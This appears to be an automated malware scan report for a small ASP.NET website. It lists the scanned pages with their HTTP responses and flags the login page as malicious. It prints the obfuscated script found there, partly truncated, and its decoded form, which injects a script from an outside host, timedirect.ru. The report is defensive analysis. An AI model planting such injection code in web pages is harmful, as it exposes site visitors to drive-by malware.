Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mwtestsite.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Scanned pages/files
Request | Server response | Status |
http://mwtestsite.com/ | HTTP/1.1 302 Found Cache-Control: private Date: Mon, 29 Dec 2014 13:50:25 GMT Location: /mwtestsite/Login.aspx Server: Microsoft-IIS/7.0 Content-Length: 143 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=p1csyu45nc13vnqprkrjib45; path=/; HttpOnly X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET | clean |
http://mwtestsite.com/mwtestsite/login.aspx | 200 OK Content-Length: 17296 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below).
Obfuscated script: var IOO='=sTKn4Ddwl2JrcicjN3L84jI3YjNwAjM9QWa/8SbvNmLyVGZuFGcvB3LvoDc0RHai0zYyNHIiQHcpJ3YTFmdhpkI9U2ZhV3ZuFGbgQHcpdyKnI3YzxzJoUGdpJ3duQnbl1Wdj9GZ';var OII=["\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","","\x63\x68\x61\x72\x41\x74","\x69\ ...[768 bytes skipped]...
Decoded script: document.write('<scr'+'ipt language="JavaScript" src="http://timedirect.ru/?id=200667"></scr'+'ipt>'); document.write('<scr'+'ipt language="JavaScript" src="http://timedirect.ru/?id=200667"></scr'+'ipt>');
Antivirus reports:
http://mwtestsite.com/mwtestsite/WebResource.axd?d=UvecD4ThJdaixfUXo2tmLbb1vOp82tnehTpZrsC4IQFZzJTIAytiixCpO6MH3n2VbIc_d8E33sxnmypIdkKzvbH6_Zg1&t=635315753528827089 | 200 OK Content-Length: 20794 Content-Type: application/x-javascript | clean |
http://mwtestsite.com/mwtestsite/ScriptResource.axd?d=8_qBcOy9jpzMbeEFi22nbigpxZ2-X0RgbLk92Wm6SQsxuul9xxi8ILZJjM044BD2qkrc7YHq5wo2zuBs4S9D9E87x8Dk9YcPC34oRhrK5BRvpwuuUzGqxEKv2UJu1gyhi8-AGy2EES_pXuZLr48IxbB2Bqs1&t=635315753528827089 | 200 OK Content-Length: 21618 Content-Type: application/x-javascript | clean |
http://mwtestsite.com/mwtestsite/ScriptResource.axd?d=KA6Ne0VdyrJn8jpO2Tt3OmJaDAScIwWUQzF7pmUK8dNRUQalkeXjlybKPjzE4CDyh4rj5ZQXx94L1GDgheNgzDWKo5Q4rZoR5W1q310YE5KF2agDzL57-ihHdzYfrIwocV2k9pAm6rxaPYAwUmNBEaud8WiZKGEMl_iQJOw3EZR2z0ru0&t=634088295413488828 | 200 OK Content-Length: 260386 Content-Type: application/x-javascript | clean |
http://mwtestsite.com/mwtestsite/ScriptResource.axd?d=UIUoA-NWGJIFfX-5d0l6q7oVq3RtDn7Zn3Q1n15bn1-R4VHlfSvmhhZsMEH7a0vLogbjgtX7M3q8oIunV3ZVjtXFgx32BgQwH7il13GIh5y7h2EeAgJjkj77hbtv0VjLB9myibCyrkrjHT9wAARqC9-2tWmfYCbd9iYTf3qEmK74sdys0&t=634088295413488828 | 200 OK Content-Length: 65868 Content-Type: application/x-javascript | clean |
http://mwtestsite.com/mwtestsite/WebResource.axd?d=bljL002ImsXatiMQUrldBHOfwBQtic1U1HjCYnI3Wlg8URkAANoGMnbMgsMNvbj5uE1N5oWBKgsKVhEg3EAqxqOS4IM1&t=635315753528827089 | 200 OK Content-Length: 3005 Content-Type: application/x-javascript | clean |
http://mwtestsite.com/test404page.js | 404 Not Found Content-Length: 1549 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mwtestsite.com
Result:
HTTP/1.1 302 Found
Cache-Control: private
Date: Mon, 29 Dec 2014 13:50:25 GMT
Location: /mwtestsite/Login.aspx
Server: Microsoft-IIS/7.0
Content-Length: 143
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=p1csyu45nc13vnqprkrjib45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
...143 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mwtestsite.com
Referer: http://www.google.com/search?q=mwtestsite.com
Result:
The result is similar to the first query. There are no suspicious redirects found.